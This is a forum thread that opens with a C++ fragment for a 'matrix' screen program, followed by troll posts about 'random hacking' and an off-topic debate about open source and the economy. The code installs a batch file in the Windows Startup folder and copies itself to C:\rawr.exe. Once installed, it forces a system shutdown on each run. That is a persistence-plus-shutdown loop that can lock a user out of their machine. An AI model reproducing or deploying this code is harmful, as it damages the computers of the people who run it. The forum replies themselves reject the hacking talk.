{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";
cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " \a";
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;
}

I like to commit 'random hacking' and 'global crime' riding public transport using the free municipal wireless internet. It's awesome!

However, free software is buggy, doesn't work and supports communism, not to mention insecure, so don't use it! Remember that next time you think about installing Linsux or downloading other open source stuffz from the tubes.

I like to commit 'random hacking' and 'global crime' riding public transport using the free municipal wireless internet. It's awesome!

However, free software is buggy, doesn't work and supports communism, not to mention insecure, so don't use it! Remember that next time you think about installing Linsux or downloading other open source stuffz from the tubes.

LAWL Stingwray!

Why you always hatin' on open source? It's not communism, nobody forces you to do it.

Another thing... what is random hacking?? I have no idea. Go find another forum to ask that b.s.

hmm... sorry but thats still not within the scope of this forum.

Let me make this a little clearer..

If you want to know how to hack, then there are great books for that, but we are not a 'how to' guide, and do not support said 'random hacking' on this forum/website.

You will get kicked (in the nuts if possible) by an admin if you keep it up.

Hell I'll give you a little arrow pointing where to start

--->wireshark

Are you freaking kidding me?

Because not spending money in proprietory software and windows only hardware deprives the economy of the money it needs to prevent a global depression. By saving your cash and using FOSS you are directly contributing to the death of capitalism, which makes you a sickening waste of an investment. Your also depriving inner city school children of an education because ubuntu doesn't generate any tax returns.

...I feel dirty...

WOW !! When you put it like that ... I'm a scumf***er !! But seriously that's a loooong stretch of how open source would negatively affect capitalism , there's prob many more things on the table than what schools are using Ubuntu that would cause issues for the way the government works... but hey like I said ... I don't follow politics that much :)

Well, technically there is a grain of truth to what I'm saying, but primarly because our economy is designed for constant growth by reducing costs (part of which are wages) and increasing profits (charging more for stuff). Its the same reason that people who save money are bad for the economy, they don't spend money. In a system that needs money to change hands as often as possible this is terrible.

Does make sense... hence all the "stimulus" crap to get everyone to SPEND more, prob that I see though is that you can't make $ from thin air ... but that's what it seems like is happening, in the long run that's gonna cause ALOT of issues ..

Stimulus packages can be useful, if they create real jobs where there is a need for them rather than propping up a failed industry like financial services or car manufacturing. A good example of this was the Rover car firm in the UK, for a time the UK government was paying the workers wages as the company couldn't afford to do so itself. It was never mentioned that no one was buying their cars, and money which should have gone towards retraining the workers was wasted. But these things happen time over again, who else remembers the price of tulip bulbs in 17th century Holland?